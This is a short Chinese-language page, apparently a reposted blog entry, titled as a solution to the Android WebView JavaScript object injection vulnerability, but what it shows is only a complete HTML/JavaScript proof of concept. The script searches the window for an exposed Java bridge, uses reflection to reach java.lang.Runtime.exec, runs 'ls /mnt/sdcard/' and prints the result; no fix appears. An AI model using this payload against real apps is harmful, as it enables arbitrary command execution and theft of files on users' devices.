Android WebView的Js對象注入漏洞解決方案

標籤：

http://blog.csdn.net/leehong2005/article/details/11808557/

webview調用以下檔案，就可以列印sdcard 檔案名稱

 1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 2 <html xmlns="http://www.w3.org/1999/xhtml"> 3  <head> 4   <title> new document </title> 5   <script > 6    var i=0; 7   function getContents(inputStream)  { 8         var contents = ""+i; 9         var b = inputStream.read();10         var i = 1;11         while(b != -1) {12             var bString = String.fromCharCode(b);13             contents += bString;14             contents += "\n"15             b = inputStream.read();16         }17         i=i+1;18         return contents;19        }20 21   function execute(cmdArgs){22          for (var obj in window) {  23             console.log(obj);24             if(window[obj]!=null)25             if ("getClass" in window[obj]) {26                 console.log("come to here");27                 //alert(obj);.28                 return window[obj].getClass().forName("java.lang.Runtime").29                     getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);  30              }  31          }      32     }33     var p = execute(["ls","/mnt/sdcard/"]);34     console.log("come to here  2");35 36     document.write(getContents(p.getInputStream()));  37   </script>38   <meta name="generator" content="editplus" />39   <meta name="author" content="" />40   <meta name="keywords" content="" />41   <meta name="description" content="" />42  </head>43 44  <body>45   46  </body>47 </html>

 

Android WebView的Js對象注入漏洞解決方案